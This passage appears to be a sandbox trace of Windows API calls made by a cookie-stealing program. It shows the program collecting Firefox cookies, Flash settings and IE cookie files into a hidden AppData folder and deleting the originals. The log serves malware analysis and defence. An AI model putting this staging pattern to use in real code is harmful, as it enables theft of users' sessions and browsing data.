dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0 [0251.453] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.453] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.453] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.454] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.454] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.454] lstrlenW (lpString="PrivacIE") returned 8 [0251.454] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="PrivacIE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE" [0251.454] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x4b [0251.454] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE", lpDst=0x7aae5c0, nSize=0x4b | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE") returned 0x4b [0251.454] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE") returned 74 [0251.454] lstrlenW (lpString="*.txt") returned 5 [0251.454] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE", pszFile="*.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\*.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\*.txt" [0251.454] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\*.txt", lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0xffffffffffffffff [0251.454] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\*" [0251.454] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\*", lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0x4406a40 [0251.454] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.454] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.454] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.454] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.455] lstrlenW (lpString="Low") returned 3 [0251.455] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE", pszFile="Low" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low" [0251.455] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x4f [0251.455] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low", lpDst=0x7aaf370, nSize=0x4f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low") returned 0x4f [0251.455] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low") returned 78 [0251.455] lstrlenW (lpString="*.txt") returned 5 [0251.455] PathCombineW (in: pszDest=0x79d0370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low", pszFile="*.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low\\*.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low\\*.txt" [0251.455] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low\\*.txt", lpFindFileData=0x79d0110 | out: lpFindFileData=0x79d0110) returned 0xffffffffffffffff [0251.464] PathCombineW (in: pszDest=0x79d0370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low\\*" [0251.464] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\PrivacIE\\Low\\*", lpFindFileData=0x79d0110 | out: lpFindFileData=0x79d0110) returned 0x44064a0 [0251.465] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79d0110 | out: lpFindFileData=0x79d0110) returned 1 [0251.465] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.465] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79d0110 | out: lpFindFileData=0x79d0110) returned 0 [0251.465] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.465] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0 [0251.465] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.465] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.465] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.465] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.465] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.465] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0 [0251.465] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.465] lstrlenA (lpString="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 58 [0251.465] mbstowcs (in: _Dest=0x79c5ed0, _Source="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", _MaxCount=0x3b | out: _Dest="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 0x3a [0251.465] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0251.465] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpDst=0x7aaf370, nSize=0x57 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 0x57 [0251.465] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}"), lpSecurityAttributes=0x0) returned 1 [0251.466] lstrlenW (lpString="\\8i341t8m.default\\cookies.sqlite") returned 32 [0251.466] lstrlenW (lpString="\\cookie.ff") returned 10 [0251.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.466] lstrcpyW (in: lpString1=0x79d0e20, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ff" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff" [0251.467] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ff"), lpSecurityAttributes=0x0) returned 1 [0251.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\" [0251.467] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrChrW") returned 0x7ff97736a2a0 [0251.467] StrChrW (lpStart="\\8i341t8m.default\\cookies.sqlite", wMatch=0x74c005c) returned="\\8i341t8m.default\\cookies.sqlite" [0251.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\", lpString2="" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\" [0251.467] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ff"), lpSecurityAttributes=0x0) returned 0 [0251.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\" [0251.468] StrChrW (lpStart="8i341t8m.default\\cookies.sqlite", wMatch=0x74c005c) returned="\\cookies.sqlite" [0251.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default" [0251.468] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ff\\8i341t8m.default"), lpSecurityAttributes=0x0) returned 1 [0251.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default\\" [0251.468] StrChrW (lpStart="cookies.sqlite", wMatch=0x74c005c) returned 0x0 [0251.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default\\cookies.sqlite" [0251.468] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ff\\\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ff\\8i341t8m.default\\cookies.sqlite"), bFailIfExists=0) returned 1 [0251.515] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite")) returned 1 [0251.520] lstrlenW (lpString="macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 51 [0251.520] lstrlenW (lpString="\\sols") returned 5 [0251.520] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.520] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.520] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\sols" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols" [0251.520] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\sols"), lpSecurityAttributes=0x0) returned 1 [0251.551] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\" [0251.551] StrChrW (lpStart="macromedia.com\\support\\flashplayer\\sys\\settings.sol", wMatch=0x74c005c) returned="\\support\\flashplayer\\sys\\settings.sol" [0251.551] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\", lpString2="macromedia.com" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com" [0251.551] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\sols\\macromedia.com"), lpSecurityAttributes=0x0) returned 1 [0251.551] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\" [0251.551] StrChrW (lpStart="support\\flashplayer\\sys\\settings.sol", wMatch=0x74c005c) returned="\\flashplayer\\sys\\settings.sol" [0251.551] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\", lpString2="support" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support" [0251.551] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\sols\\macromedia.com\\support"), lpSecurityAttributes=0x0) returned 1 [0251.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\" [0251.552] StrChrW (lpStart="flashplayer\\sys\\settings.sol", wMatch=0x74c005c) returned="\\sys\\settings.sol" [0251.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\", lpString2="flashplayer" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer" [0251.552] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\sols\\macromedia.com\\support\\flashplayer"), lpSecurityAttributes=0x0) returned 1 [0251.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\" [0251.552] StrChrW (lpStart="sys\\settings.sol", wMatch=0x74c005c) returned="\\settings.sol" [0251.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\", lpString2="sys" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys" [0251.552] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\sols\\macromedia.com\\support\\flashplayer\\sys"), lpSecurityAttributes=0x0) returned 1 [0251.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys\\" [0251.552] StrChrW (lpStart="settings.sol", wMatch=0x74c005c) returned 0x0 [0251.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="settings.sol" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" [0251.552] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\sols\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\sols\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), bFailIfExists=0) returned 1 [0251.557] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol")) returned 1 [0251.558] lstrlenW (lpString="2XBM2EDN.txt") returned 12 [0251.558] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.558] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.558] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.558] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: 